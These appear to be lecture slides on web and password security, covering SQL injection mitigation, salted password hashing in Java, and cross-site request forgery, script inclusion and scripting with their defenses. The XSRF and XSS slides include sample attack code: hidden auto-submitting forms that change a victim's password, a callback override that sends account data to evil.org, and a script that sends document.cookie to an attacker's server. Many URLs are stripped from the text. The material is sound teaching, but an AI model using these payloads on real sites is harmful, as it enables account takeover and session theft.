No explicit typing of parameters like in Java Apply consistently: adding $year parameter directly to query still creates SQL injection threat Have separate module for DB access Do prepared statements here Gateway to DB for rest of code $ps = $db->prepare( 'SELECT pizza, toppings, quantity, order_day '. 'FROM orders WHERE userid=? AND order_month=?'); $ps->execute(array($current_user_id, $month));

194 SQL Stored Procedures Stored procedure: sequence of SQL statements executing on specified inputs Ex:
CREATE PROCEDURE change_password @username VARCHAR(25), @new_passwd VARCHAR(25) AS UPDATE USERS SET passwd=new_passwd WHERE uname=username
Vulnerable use (string concatenation):
$db->exec("change_password '" . $uname . "','" . $new_passwd . "'");
Instead use bind variables w/ stored procedure:
$ps = $db->prepare("change_password ?, ?");
$ps->execute(array($uname, $new_passwd));

195 8.2.6. Mitigating the Impact of SQL Injection Attacks
Prevent Schema & Information Leaks Limit Privileges (Defense-in-Depth) Encrypt Sensitive Data stored in Database Harden DB Server and Host O/S Apply Input Validation

196 8.2.6. Prevent Schema & Information Leaks
Knowing database schema makes attacker’s job easier Blind SQL Injection: attacker attempts to interrogate system to figure out schema Prevent leakages of schema information Don’t display detailed error messages and stack traces to external users

197 8.2.6. Limiting Privileges Apply Principle of Least Privilege! Limit
Read access, tables/views user can query Commands (are updates/inserts ok?) No more privileges than typical user needs Ex: could prevent attacker from executing INSERT and DROP statements But attacker could still run SELECT attacks and compromise user data Not a complete fix, but less damage

198 8.2.6. Encrypting Sensitive Data
Encrypt data stored in the database second line of defense w/o key, attacker can’t read sensitive info Key management precautions: don’t store key in DB, attacker just SQL injects again to get it Some databases allow automatic encryption, but these still return plaintext queries!

199 8.2.6. Hardening DB Server and Host O/S
Dangerous functions could be on by default Ex: Microsoft SQL Server Allows users to open inbound/outbound sockets Attacker could steal data, upload binaries, port scan victim’s network Disable unused services and accounts on OS (Ex: No need for web server on DB host)

200 8.2.6. Applying Input Validation
Validation of query parameters not enough Validate all input early at entry point into code Reject overly long input (could prevent unknown buffer overflow exploit in SQL parser) Redundancy helps protect systems E.g. if programmer forgets to apply validation for query input Two lines of defense

201 Summary SQL injection attacks are important security threat that can
Compromise sensitive user data Alter or damage critical data Give an attacker unwanted access to DB Key Idea: Use diverse solutions, consistently! Whitelisting input validation & escaping Prepared Statements with bind variables

202 CHAPTER 9 Password Security

203 Agenda Password systems ubiquitous, vulnerable
Early password security study: Morris & Thompson, "Password Security: A Case History" (1979): 86% of passwords could be cracked Threats: Online & Offline Dictionary Attacks Solutions: Hashing & Salting

204 9.1. A Strawman Proposal Basic password system: file w/ username, password records (colon delimiter) john:automobile mary:balloon joe:wepntkas Simple to implement, but risky All users compromised if hacker gets the passwd file Done in Java: MiniPasswordManager

205 9.1. MiniPasswordManager public class MiniPasswordManager {
/** dUserMap is a Hashtable keyed by username */
private static Hashtable dUserMap;
/** location of the password file on disk */
private static String dPwdFile;

public static void add(String username, String password) throws Exception {
  dUserMap.put(username, password);
}

public static boolean checkPassword(String username, String password) {
  try {
    String t = (String)dUserMap.get(username);
    return (t == null) ? false : t.equals(password);
  } catch (Exception e) {}
  return false;
}
...

206 9.1. MPM: File Management public class MiniPasswordManager { ...
/* Password file management operations follow */
public static void init(String pwdFile) throws Exception {
  dUserMap = MiniPasswordFile.load(pwdFile);
  dPwdFile = pwdFile;
}

public static void flush() throws Exception {
  MiniPasswordFile.store(dPwdFile, dUserMap);
}
... // main()

207 9.1. MPM: main() public static void main(String argv[]) {
String pwdFile = null;
String userName = null;
try {
  pwdFile = argv[0];
  userName = argv[1];
  init(pwdFile);
  System.out.print("Enter new password for " + userName + ": ");
  BufferedReader br = new BufferedReader(new InputStreamReader(System.in));
  String password = br.readLine();
  add(userName, password);
  flush();
} catch (Exception e) {
  if ((pwdFile != null) && (userName != null)) {
    System.err.println("Error: Could not read or write " + pwdFile);
  } else {
    System.err.println("Usage: java MiniPasswordManager <pwdfile> <username>");
  }
}
}

208 9.1. MPM Analysis Two key functions: username, password args
add() – add entry to dUserMap hashtable checkPassword() – lookup in dUserMap Read/Write dUserMap from/to disk using init()/flush() MiniPasswordFile helper class exposes store() and load() methods for these tasks More to do to make secure…

209 9.2. Hashing Encrypt passwords, don’t store “in the clear”
Could decrypt (e.g. DES) to check, but then where would the key be stored? Even better: “one-way encryption”, no way to decrypt If file stolen, passwords not compromised Use one-way hash function, h: preimage resistant Ex: SHA-256 hashes stored in file, not plaintext passwd john:9Mfsk4EQh+XD2lBcCAvputrIuVbWKqbxPgKla7u67oo= mary:AEd62KRDHUXW6tp+XazwhTLSUlADWXrinUPbxQEfnsI= joe:J3mhF7Mv4pnfjcnoHZ1ZrUELjSBJFOo1r6D6fx8tfwU=

210 9.2. Hashing Example Hash: “One-way encryption”
“What is your username & password?” My name is john. My password is automobile. Does h(automobile) = 9Mfsk4EQ… ??? Assume that Joe is a good guy. Hash: “One-way encryption” No need to (can’t) decrypt Just compare hashes Plaintext password not in file, not “in the clear”

211 9.2. Hashing MPM Modifications
public static void add(String username, String password) throws Exception {
  dUserMap.put(username, computeSHA(password));
}

public static boolean checkPassword(String username, String password) {
  try {
    String t = (String)dUserMap.get(username);
    return (t == null) ? false : t.equals(computeSHA(password));
  } catch (Exception e) {}
  return false;
}

private static String computeSHA(String preimage) throws Exception {
  MessageDigest md = MessageDigest.getInstance("SHA-256");
  md.update(preimage.getBytes("UTF-8"));
  byte raw[] = md.digest();
  return (new sun.misc.BASE64Encoder().encode(raw)); // sun.misc is JDK-internal; java.util.Base64 is the modern replacement
}

212 9.3. Off-line Dictionary Attacks
Offline: attacker steals file and tries combos Online: try combos against live system
Attacker Obtains Password File: joe 9Mfsk4EQ... mary AEd62KRD... john J3mhF7Mv...
Attacker computes possible password hashes (using words from dictionary): h(automobile) = 9Mfsk4EQ... h(aardvark) = z5wcuJWE... h(balloon) = AEd62KRD... h(doughnut) = tvj/d6R4...
Match on AEd62KRD: mary has password balloon!
But what if Joe is a bad-guy and the password file is readable?

213 9.4. Salting Salting – include additional info in hash
Add third field to file storing random # (salt) Example Entry: john with password automobile Hash of password concatenated with salt: h(automobile|1515) = ScF5GDhW... john:ScF5GDhWeHr2q5m7mSDuGPVasV2NHz4kuu5n5eyuMbo=:1515

214 9.4. Salting Functions
public static int chooseNewSalt() throws NoSuchAlgorithmException {
  return getSecureRandom((int)Math.pow(2,12));
}

/* Returns a cryptographically random number in the range [0,max) */
private static int getSecureRandom(int max) throws NoSuchAlgorithmException {
  SecureRandom sr = SecureRandom.getInstance("SHA1PRNG");
  return Math.abs(sr.nextInt()) % max;
}

public static String getSaltedHash(String pwd, int salt) throws Exception {
  return computeSHA(pwd + "|" + salt);
}

215 9.4. Salting in MPM (1)
/* Chooses a salt for the user, computes the salted hash of the user's password, and adds a new entry into the userMap hashtable for the user. */
public static void add(String username, String password) throws Exception {
  int salt = chooseNewSalt();
  HashedPasswordTuple ur = new HashedPasswordTuple(getSaltedHash(password, salt), salt);
  dUserMap.put(username, ur);
}

public static boolean checkPassword(String username, String password) {
  try {
    HashedPasswordTuple t = (HashedPasswordTuple)dUserMap.get(username);
    return (t == null) ? false : t.getHashedPassword().equals(getSaltedHash(password, t.getSalt()));
  } catch (Exception e) {}
  return false;
}

216 9.4. Salting in MPM (2) dUserMap stores HashedPasswordTuple, hashed password and salt To add(), we chooseNewSalt() to getSecureRandom() number in [0, 4096) getSaltedHash() to compute h(passwd|salt) checkPassword() by comparing hash on file w/ salted hash of input password and salt on file

217 9.4. Salting: Good News Dictionary attack against arbitrary user is harder Before Salts: hash word & compare with password file After Salts: hash combos of word & possible salts n-word dictionary, k-bit salts, v distinct salts: Attacker must hash n*min(v, 2k) strings vs. n (no salt) If many users (>> 2k, all salts used), 2k harder attack! Approx. same amount of work for password system

218 9.4. Off-line Dictionary Attack Foiled!
h(automobile2975) = KNVXKOHBDEBKOURX h(automobile1487) = ZNBXLPOEWNVDEJOG h(automobile2764) = ZMCXOSJNFKOFJHKDF h(automobile4012) = DJKOINSLOKDKOLJUS h(automobile3912) = CNVIUDONSOUIEPQN …Etc… h(aardvark2975) = DKOUOXKOUDJWOIQ h(aardvark1487) = PODNJUIHDJSHYEJNU But what if Joe is a bad-guy and the password file is readable? (Note that many attacks are committed by insiders.) Too many combinations!!! Attack is Foiled! /etc/passwd: john LPINSFRABXJYWONF 2975 mary DOIIDBQBZIDRWNKG 1487 joe LDHNSUNELDUALKDY 2764

219 9.4. Salting: Bad News Ineffective against chosen-victim attack
Attacker wants to compromise particular account Just hash dictionary words with victim’s salt Attacker’s job harder, not impossible Easy for attacker to compute 2kn hashes? Then offline dictionary attack still a threat.

220 9.4. BasicAuthWebServer (BAWS)
Adapt (and rename) SimpleWebServer from Ch. 2 to use MiniPasswordManager Used to implement HTTP authorization Only authenticated clients can access documents from our server First, create a password file: $ java MiniPasswordManager pwdfile hector Warning: Could not load password file. #pwdfile doesn't exist yet Enter new password for hector: lotsadiserts $ java com.learnsecurity.MiniPasswordManager pwdfile dan Enter new password for dan: cryptguru $ cat pwdfile #now it exists (after hector is added) dan:O70FKijze89PDJtQHM8muKC+aXbUJIM/j8T4viT62rM=:3831 hector:laX1pk2KoZy1ze64gUD6rc/pqMuAVmWcKbgdQLL0d7w=:1466

221 9.4. HTTP Authorization Client makes request: GET /index.html HTTP/1.1
Server requests authentication: Client replies with base-64 encoded username/password combo: Only encoded, not encrypted in basic HTTP auth Eavesdropper can sniff: HTTP digest authorization and/or SSL can help HTTP/ Unauthorized WWW-Authenticate: Basic realm="BasicAuthWebServer" GET /index.html HTTP/1.1 Authorization: Basic aGVjdG9yOmxvdHNhZGlzZXJ0cw==

222 9.4. BAWS Explanation BAWS = BasicAuthWebServer
During processRequest(), use getAuthorization() to check Credentials object (stores username and password) Then checkPassword() to determine whether to serveFile() main() method modified to accept password filename from command line

223 9.4. BAWS: processRequest()
public void processRequest(Socket s) throws Exception { //... some code excluded... if (command.equals("GET")) { // handle GET request Credentials c = getAuthorization(br); if ((c != null) && (MiniPasswordManager.checkPassword(c.getUsername(), c.getPassword()))) { serveFile(osw, pathname); } else { osw.write ("HTTP/ Unauthorized"); osw.write ("WWW-Authenticate: Basic"+ "realm=BasicAuthWebServer"); } } else { //... some code excluded ...}

224 9.4. BAWS: getAuthorization()
private Credentials getAuthorization (BufferedReader br) { try { String header = null; while (!(header = br.readLine()).equals("")) { if (header.startsWith("Authorization:")) { StringTokenizer st = new StringTokenizer(header, " "); st.nextToken(); // skip "Authorization" st.nextToken(); // skip "Basic" return new Credentials(st.nextToken()); } } catch (Exception e) {} return null;

225 9.4. BAWS: main() public static void main (String argv[]) throws Exception { if (argv.length == 1) {// Initialize MiniPasswordManager MiniPasswordManager.init(argv[0]); /* Create a BasicAuthWebServer object, and run it */ BasicAuthWebServer baws = new BasicAuthWebServer(); baws.run(); } else { System.err.println ("Usage: java BasicAuthWebServer"+ "<pwdfile>"); }

226 9.5. Online Dictionary Attacks
Attacker actively tries combos on live system Can monitor attacks Watch for lots of failed attempts Mark or block suspicious IPs Avoid verification at the server, which sees the password in the clear Vulnerable to phishing: impersonator steals password Password-authenticated key exchange (PAKE), zero-knowledge proofs avoid sending password PAKE & zero-knowledge not yet efficient enough for commercial use

227 9.6. Additional Password Security Techniques
Several other techniques to help securely manage passwords: Mix and match ones that make sense for particular app Strong Passwords “Honeypots” Filtering Aging Pronounceable Limiting Logins Artificial Delays Last Login Image Authentication One-Time Passwords But what if the salt is too small? (It is only 2^12 in Linux/UNIX). The /etc/shadow file is set so that it cannot be read by just anyone. Only root will be able to read and write to the /etc/shadow file. Some programs (like xlock) don't need to be able to change passwords, they only need to be able to verify them. These programs can either be run suid root or you can set up a group shadow that is allowed read only access to the /etc/shadow file. Then the program can be run sgid shadow. By moving the passwords to the /etc/shadow file, we are effectively keeping the attacker from having access to the encoded passwords with which to perform a dictionary attack. Booby-trap: have an unused (guest/guest) password. When someone logs in with it, notify security personnel. (Problem with the number of hackers these days, too many false positives!)

228 Strong Passwords Not concatenation of 1 or more dictionary words Long as possible: letters, numbers, special chars Can create from long phrases: Ex: “Nothing is really work unless you would rather be doing something else” -> n!rWuUwrbds3 Use 1st letter of each word, transform some chars into visually or phonetically similar ones Protect password file, limit access to admin UNIX used to store in /etc/passwd (readable by all) Now stored in /etc/shadow (req’s privileges/admin)

229 “Honeypot” Passwords Simple username/password (guest/guest) combos as “honey” to attract attackers Bait attackers into trying simple combos Alert admin when “booby-trap” triggered Could be indication of attack ID the IP and track to see what they’re up to

230 9.6.3. Password Filtering Let user choose password
Within certain restrictions to guarantee stronger password Ex: reject choices that are in the dictionary or easy to guess May require mixed case, numbers, special chars Can specify set of secure passwords through regular expressions Also set a particular min length

231 Aging Passwords Encourage/require users to change passwords every so often Every time user enters password, potential for attacker to eavesdrop Changing frequently makes any compromised password of limited-time use to attacker Could “age” passwords by only accepting it a certain number of times But if require change too often, then users will workaround, more insecure

232 9.6.5. Pronounceable Passwords
Users want to choose dictionary words because they’re easy to remember Pronounceable Passwords Non-dictionary words, but also easy to recall Syllables & vowels connected together Gpw package generates examples e.g. ahrosios, chireckl, harciefy

233 9.6.6. Limited Login Attempts
Allow just 3-4 logins, then disable or lock account Attacker only gets fixed number of guesses Inconvenient to users if they’re forgetful Legitimate user would have to ask sys admin to unlock or reset their password Potential for DoS attacks if usernames compromised and attacker guesses randomly for all, locking up large percentage of users of system

234 9.6.7. Artificial Delays Artificial delay when user tries login over network Wait 2^n seconds after nth failure from particular IP address Only minor inconvenience to users (it should only take them a couple of tries, 10 seconds delay at most) But makes attacker’s guesses more costly, decreases number of guesses they can try in fixed time interval HTTP Proxies can be problematic One user mistyping password may delay another user Need more sophisticated way to delay
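A minimal sketch of the 2^n-second delay, assuming a per-IP failure counter (the data structure and the cap are illustrative; a real server would also need entry expiry and proxy-aware keys):

import java.util.concurrent.ConcurrentHashMap;

public class LoginThrottle {
    private final ConcurrentHashMap<String, Integer> failures = new ConcurrentHashMap<>();

    public void onFailure(String ip) throws InterruptedException {
        int n = failures.merge(ip, 1, Integer::sum);  // consecutive failures from this IP
        long delayMs = (1L << Math.min(n, 6)) * 1000; // 2^n seconds, capped at 64 s
        Thread.sleep(delayMs);                        // delay before answering
    }

    public void onSuccess(String ip) {
        failures.remove(ip);                          // reset counter on success
    }
}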

235 Last Login Notify user of last login date, time, location each time they login Educate them to pay attention Tell user to report any inconsistencies Discrepancies = indications of attacks Catch attacks that may not have been noticed Ex: Alice usually logs in monthly from CA Last login was 2 weeks ago in Russia Alice knows something’s wrong, reports it

236 9.6.9. Image Authentication Combat phishing: images as second-factor
Ask users to pick image during account creation Display at login after username is entered Phisher can’t spoof the image Educate user to not enter password if he doesn’t see the image he picked Recently deployed by PassMark and used by financial institutions

237 One-Time Passwords Multiple uses of password gives attacker multiple opportunities to steal it OTP: log in with different password each time Devices generate passwords to be used each time user logs in Device uses seed to generate stream of passwords Server knows seed, current time, can verify password OTP devices integrated into PDAs, cell-phones
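A rough sketch of how such a device/server pair could compute matching one-time passwords, loosely following the HMAC-based truncation of RFC 4226 (HOTP); the seed/counter handling here is an illustrative assumption, not the book's design:

import java.nio.ByteBuffer;
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;

public class OneTimePassword {
    // Both device and server run this on the shared seed and current counter
    public static int otp(byte[] seed, long counter) throws Exception {
        Mac mac = Mac.getInstance("HmacSHA1");
        mac.init(new SecretKeySpec(seed, "HmacSHA1"));
        byte[] h = mac.doFinal(ByteBuffer.allocate(8).putLong(counter).array());
        int off = h[h.length - 1] & 0x0f;             // dynamic truncation offset
        int bin = ((h[off] & 0x7f) << 24) | ((h[off + 1] & 0xff) << 16)
                | ((h[off + 2] & 0xff) << 8) | (h[off + 3] & 0xff);
        return bin % 1_000_000;                       // 6-digit one-time password
    }
}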

238 CHAPTER 10 Cross-Domain Security in Web Applications

239 Agenda Domain: where our apps & services are hosted
Cross-domain: security threats due to interactions between our applications and pages on other domains Alice is simultaneously (i.e. same browser session), using our (“good”) web-application and a “malicious” web-application Security Issues? Solutions? Cross-Site Request Forgery, Scripting…

240 10.1. Interaction Between Web Pages From Different Domains
Possible interactions limited by same-origin policy (a.k.a. cross-domain security policy) Links, embedded frames, data inclusion across domains still possible Client-side scripts can make requests cross-domain HTTP & cookie authentication two common modes (both are usually cached) Cached credentials associated with browser instance Future (possibly malicious) requests don’t need further authentication

241 10.1.1. HTML, JavaScript, and the Same-Origin Policy
Modern browsers use DHTML Support style layout through CSS Behavior directives through JavaScript Access Document Object Model (DOM) allowing reading/modifying page and responding to events Origin: protocol, hostname, port, but not path Same-origin policy: scripts can only access properties (cookies, DOM objects) of documents of same origin

242 10.1.1. Same-Origin Examples Same Origin All Different Origins
same protocol: http, host: examplesite, default port 80 All Different Origins Different protocol: http vs. https, different ports: 80 vs. 8080, different hosts: examplesite vs. hackerhome

243 10.1.2. Possible Interactions of Documents from Different Origins (1)
hackerhome.org can link to us, can’t control <a href=" here!</a> Or include a hidden embedded frame: <iframe style="display: none" src=" some_url"></iframe> No visible cue to the user (style attribute hides it) Happens automatically, without user interaction Same-origin policy prevents JavaScript on hackerhome direct access to our DOM

244 10.1.2. Possible Interactions (2)
Occasionally, data loaded from one domain is considered to originate from different domain <script src=" hackerhome can include this script loaded from our site, but it is considered to originate from hackerhome instead Included script can inspect contents of enclosing page which can define evaluation environment for script

245 10.1.2. Possible Interactions (3)
Another way attacker can initiate requests from user’s browsers to our server: Form is submitted to our server without any input from user Only has a hidden input field, nothing visible to user Form has a name, so script can access it via DOM and automatically submit it <form name="f" method="POST" action=" <input type="hidden" name="cmd" value="do_something"> ... </form> <script>document.f.submit();</script>

246 10.1.3. HTTP Request Authentication
HTTP is stateless, so web apps have to associate requests with users themselves HTTP authentication: username/passwd automatically supplied in HTTP header Cookie authentication: credentials requested in form, after POST app issues session token Browser returns session cookie for each request Hidden-form authentication: hidden form fields transfer session token Http & cookie authentication credentials cached

247 10.1.4. Lifetime of Cached Cookies and HTTP Authentication Credentials
Temporary cookies cached until browser shut down, persistent ones cached until expiry date HTTP authentication credentials cached in memory, shared by all browser windows of a single browser instance Caching depends only on browser instance lifetime, not on whether original window is open

248 10.1.4. Credential Caching Scenario
(1) Alice has browser window open, (2) creates new window (3) to visit our site, HTTP authentication credentials stored (4) She closes the window, but original one still open (5) later, she’s lured to the hacker’s site which causes a surreptitious request to our site utilizing the cached credentials Credentials persisted even after (4), cookies could have been timed-out; step (5) could happen days or weeks after (4)

249 10.2. Attack Patterns Security issues arising from browser interacting with multiple web apps (ours and malicious ones), not direct attacks Cross-Site Request Forgery (XSRF) Cross-Site Script Inclusion (XSSI) Cross-Site Scripting (XSS)

250 10.2.1. Cross-Site Request Forgery (XSRF)
Malicious site can initiate HTTP requests to our app on Alice’s behalf, w/o her knowledge Cached credentials sent to our server regardless of who made the request Ex: change password feature on our app Hacker site could execute a script that sends a fake password-change request to our server; it authenticates because Alice’s cookies are sent along <form method="POST" action="/update_profile"> ... New Password: <input type="password" name="password"> ... </form>

251 XSRF Example 1. Alice’s browser loads page from hackerhome.org 2. Evil Script runs causing evilform to be submitted with a password-change request to our “good” form: with a <input type="password" id="password"> field evilform <form method="POST" name="evilform" target="hiddenframe" action=" <input type="hidden" id="password" value="evilhax0r"> </form> <iframe name="hiddenframe" style="display: none"> </iframe> <script>document.evilform.submit();</script> 3. Browser sends authentication cookies to our app. We’re hoodwinked into thinking the request is from Alice. Her password is changed to evilhax0r!

252 XSRF Impacts Malicious site can’t read info, but can make write requests to our app! In Alice’s case, attacker gained control of her account with full read/write access! Who should worry about XSRF? Apps w/ server-side state: user info, updatable profiles such as username/passwd (e.g. Facebook) Apps that do financial transactions for users (e.g. Amazon, eBay) Any app that stores user data (e.g. calendars, tasks)

253 Example: Normal Interaction
Alice bank.com /login.html /auth uname=victim&pass=fmd9032 Cookie: sessionid=40a4c04de /viewbalance Cookie: sessionid=40a4c04de “Your balance is $25,000”

254 Example: Another XSRF Attack
Alice bank.com evil.org /login.html /auth uname=victim&pass=fmd9032 Cookie: sessionid=40a4c04de /evil.html <img src=" addr=123 evil st & amt=$10000"> /paybill?addr=123 evil st, amt=$10000 Cookie: sessionid=40a4c04de “OK. Payment Sent!”

255 10.2.2. Cross-Site Script Inclusion (XSSI)
3rd-party can include <script> sourced from us Static Script Inclusion Purpose is to enable code sharing, i.e. providing JavaScript library for others to use Including 3rd-party script dangerous w/o control since it runs in our context with full access to client data Dynamic Script Instead of traditional postback of new HTML doc, asynchronous requests (AJAX) used to fetch data Data exchanged via XML or JSON (arrays, dicts)

256 10.2.2. XSSI Malicious website can request dynamic script
Browser authentication cookies would be sent Script (JSON fragment) returned by server is accessible to and runs on the malicious site But, script is evaluated in hacker’s context Hacker redefines the callback method to process and harvest the user data as desired

257 JavaScript Code Snippet
Typical Interaction: client requests the JavaScript code snippet, server’s reply sends back user data:
UpdateHeader({ "date_time": "2007/07/19 6:22", "logged_in_user": "alice", "account_balance": "256.98" })
Attack Scenario: malicious site loads the script to initiate the request instead; browser sends cookies; server replies as usual; evil script gets user data!
<script>
function UpdateHeader(dict) {
  if (dict['account_balance'] > 100) {
    do_phishing_redirect(dict['logged_in_user']); // do evil stuff, get user data
  }
}
</script>
<script src="

258 XSSI Example: AJAX Script
Dynamic Script Inclusion: viewbalance.html Good Site:
<script>
x = new XMLHttpRequest(); // used to make an AJAX request
x.onreadystatechange = ProcessResults;
x.open("POST", "
function ProcessResults() {
  if (x.readyState == 4 && x.status == 200)
    eval(x.responseBody);
}
</script>

259 Normal AJAX Interaction
Alice bank.com login & authenticate Cookie: sessionid=40a4c04de /viewbalance.html Cookie: sessionid=40a4c04de /json/get_data?callback=RenderData RenderData({“acct_no”:”494783”, “balance”:”10000”}) RenderData

260 Another XSSI Attack Alice bank.com evil.org /evil.html
login & authenticate Cookie: sessionid=40a4c04de /viewbalance.html Cookie: sessionid=40a4c04de /evil.html <script> function RenderData(args) { sendArgsToEvilOrg(args); } </script> <script src=" callback=RenderData"> RenderData({“acct_no”:”494783”, “balance”:”10000”}) Overrides Callback! RenderData({“acct_no”:”494783”, “balance”:”10000”})

261 10.2.3. Cross-Site Scripting (XSS)
What if attacker can get a malicious script to be executed in our application’s context? access user’s cookies, transfer to their server Ex: our app could have a query parameter in a search URL and print it out on page Following fragment in returned HTML document with value of parameter question inserted into page Unfiltered input allows attacker to inject scripts ...<p>Your query for 'cookies' returned the following results:</p>...

262 XSS Example Alice tricked into loading URL (thru link or hidden frame sourcing it) Server’s response contains Attack string URL-encodes < and > malicious-script, any script attacker desires, is executed in context of our domain question=cookies+%3Cscript%3Emalicious-script%3C/script%3E <p>Your query for 'cookies <script>malicious-script</script>' returned the following results:</p>

263 10.2.3. XSS Exploits: Stealing Cookies
Malicious script could cause browser to send attacker all cookies for our app’s domain Attacker gains full access to Alice’s session Script associated with our domain Can access document.cookie in DOM Constructs URL on attacker’s server, gets saved in a log file, can extract info from cookie parameter <script> i = new Image(); i.src = " + escape(document.cookie); // URL-encode </script>

264 10.2.3. XSS Exploits: Scripting the Vulnerable Application
Complex script with specific goal Get personal user info, transfer funds, etc… More sophisticated than just stealing cookies Advantages over cookie stealing Stolen session cookie may expire before it’s used Never makes a direct request to our server We can’t log his IP, he’s harder to trace

265 10.2.3. XSS Exploits: Modifying Web Pages
Attacker can script modifications to web pages loaded from our site by manipulating DOM Part of social engineering, phishing attack Intended for viewing by victim user Modified page is loaded from our site So URL is still the same No certificate-mismatch even with SSL Hard to tell that modification is by 3rd party

266 10.2.3. Sources of Untrusted Data
Query parameters, HTML form fields Path of the URI which could be inserted into page via a “Document not found” error Cookies, parts of the HTTP request header (e.g. Referer header) Data inserted into a SQL DB, file system 3rd party data (e.g. RSS feed)

267 10.2.3. Stored vs. Reflected XSS
Reflected XSS: script injected into a request and returned immediately in response (like query parameter example) Stored XSS: script delivered to victim some time after being injected stored somewhere in the meantime attack is repeatable, more easily spread Ex: Message board with injected script in a message, all users who view the message will be attacked Underlying issue for both is untrusted data

268 10.2.3. MySpace Attacked by Stored XSS Worm
XSS really damaging when stored XSS can propagate in a worm-like pattern In 2005, XSS worm released on MySpace Propagated through profiles via friend connections Payload harmless: added user “Samy” to infected user’s friends list Impact: MySpace down for several hours to clean up profiles (but XSS worm impact could be much worse!)

269 10.3. Preventing XSRF HTTP requests originating from user action are indistinguishable from those initiated by a script Need own methods to distinguish valid requests Inspecting Referer Headers Validation via User-Provided Secret Validation via Action Token

270 10.3.1. Inspecting Referer Headers
Referer header specifies the URI of document originating the request Assuming requests from our site are good, don’t serve requests not from our site OK, but not practical since it could be forged or blanked (even by legitimate users) For well-behaved browsers, reasonable to expect Referer headers to be accurate, if present But if blank, we can’t tell if it’s legitimate or not

271 10.3.2. Validation via User-Provided Secret
Can require user to enter secret (e.g. login password) along with requests that make server-side state changes or transactions Ex: The change password form (10.2.1) could ask for the user’s current password Balance with user convenience: use only for infrequent, “high-value” transactions Password or profile changes Expensive commercial/financial operations

272 10.3.3. Validation via Action Token
Add special action tokens as hidden fields to “genuine” forms to distinguish from forgeries Same-origin policy prevents 3rd party from inspecting the form to find the token Need to generate and validate tokens so that Malicious 3rd party can’t guess or forge token Then can use to distinguish genuine and forged forms How? We propose a scheme next.

273 10.3.3. Generating Action Tokens
Concatenate value of timestamp or counter c with the Message Authentication Code (MAC) of c under secret key K: Token: T = MAC_K(c) || c Security dependent on crypto algorithm for MAC || denotes string concatenation, T can be parsed into individual components later Recall from 1.5., MACs are function of message and secret key (See Ch. 15 for more details)

274 10.3.3. Validating Action Tokens
Split token T into MAC and counter components Compute expected MAC for given c and check that given MAC matches If MAC algorithm is secure and K is secret, 3rd party can’t create MAC_K(c), so can’t forge token

275 Problem with Scheme Application will accept any token we’ve previously generated for a browser Attacker can use our application as an oracle! Uses own browser to go to page on our site w/ form Extracts the token from hidden field in form Need to also verify that incoming request has action token sent to the same browser (not just any token sent to some browser)

276 10.3.3. Fixing the Problem Bind value of action token to a cookie
Same-origin policy prevents 3rd party from reading or setting our cookies Use cookie to distinguish between browser instances New Scheme Cookie C is unpredictable, unique to browser instance C can be session authentication cookie Or random 128 bits specifically for this purpose L = action URL for form with action token Compute T = MAC_K(C||d||L), d is separator (e.g. ;) d ensures uniqueness of concatenation

277 10.3.3. Validation in New Scheme
Extract request URL L’ (w/o query part for GET request) and cookie C’. Compute expected value of action token: T_expected = MAC_K(C’||d||L’) Extract actual T_request of action token from appropriate request parameter Verify T_expected = T_request, otherwise reject Occasionally legitimate request may fail Ex: user leaves page w/ form open and initiates new session in different window; action token for original form becomes “stale”
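A sketch of this token scheme using javax.crypto's HMAC support; key management and the cookie/URL plumbing are assumptions for illustration, not the book's code:

import java.security.MessageDigest;
import java.util.Base64;
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;

public class ActionToken {
    private static final String D = ";";              // separator d from the scheme

    private static String mac(byte[] key, String msg) throws Exception {
        Mac m = Mac.getInstance("HmacSHA256");
        m.init(new SecretKeySpec(key, "HmacSHA256"));
        return Base64.getEncoder().encodeToString(m.doFinal(msg.getBytes("UTF-8")));
    }

    // T = MAC_K(C || d || L): bound to cookie C and action URL L
    public static String generate(byte[] key, String cookie, String url) throws Exception {
        return mac(key, cookie + D + url);
    }

    public static boolean validate(byte[] key, String cookie, String url, String token)
            throws Exception {
        String expected = mac(key, cookie + D + url);
        // constant-time comparison avoids leaking where a mismatch occurs
        return MessageDigest.isEqual(expected.getBytes("UTF-8"), token.getBytes("UTF-8"));
    }
}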

278 10.3.4. Security Analysis of the Action Token Scheme
Value of token chosen to be unguessable Output of cryptographically strong MAC algorithm Attack rate limited by JavaScript loop, far slower than rates usually supposed for offline attacks against crypto algorithms Only way to obtain token (w/o key) is to use our app as an oracle This also requires the user’s session cookie Assume attacker doesn’t have this otherwise he could already directly hijack the session anyway Session cookies are also hard to guess

279 10.3.4. Security Analysis: Leakage of Action Tokens
For GET requests, action token visible as query parameter in request URL Would appear in proxy and web server logs Could be leaked in Referer header if page contains references (images, links) to 3rd party documents HTTP spec recommends POST instead of GET Scheme incorporates target action URL into MAC computation If one URL is leaked, can’t be used against another Use fresh cookie for each browser instance, so stolen action token not usable for future sessions

280 10.3.4. Analysis: Limitations in Presence of XSS Vulnerabilities
If application is vulnerable to XSS attack, action token scheme is ineffective. Attacker can inject script to steal cookies and corresponding action tokens. Or even directly “fill out” forms and submit request within context of user’s session But if XSS vulnerability exists, attacker already has a better mode of attack than XSRF

281 10.3.4. Analysis: Relying on Format of Submitted Data
Communication with server often follows RPC pattern through XMLHttpRequest object Marshalling data in some form (e.g. JSON/XML) Form-based request ex: results in following POST request (not valid JSON) Form’s fields encoded as key/value pairs Metacharacters (&, =, space) are URL-encoded All key/value pairs concatenated, separated by & char <form method="POST" action=" <input name="foo" value="I'd like a cookie"> <input name="bar" value="and some tea & coffee"> </form> foo=I'd%20like%20a%20cookie&bar=and%20some%20tea%20%26%20coffee

282 10.3.4. Relying on Format of Submitted Data
<form> tag also has enctype attribute specifying encoding via MIME media type Default: application/x-www-form-urlencoded text/plain (&-separated pairs w/o encoding) Form Example and corresponding POST: POST request can have arbitrary content (including valid JSON/XML)! Can’t just rely on format, use action tokens to prevent XSRF! <form method="POST" action=" enctype="text/plain"> <input name='{"junk": "ig' value='nore", "new_password": "evilhax0r"}'> </form> Valid JSON! {"junk": "ig=nore", "new_password": "evilhax0r"}

283 10.4. Preventing XSSI Can’t stop others from loading our resources
Similar problem with preventing XSRF need to distinguish 3rd party references from legitimate ones, so we can deny the former Authentication via Action Token Restriction to POST Requests Preventing Resource Access for Cost

284 10.4.1. Authentication via Action Token
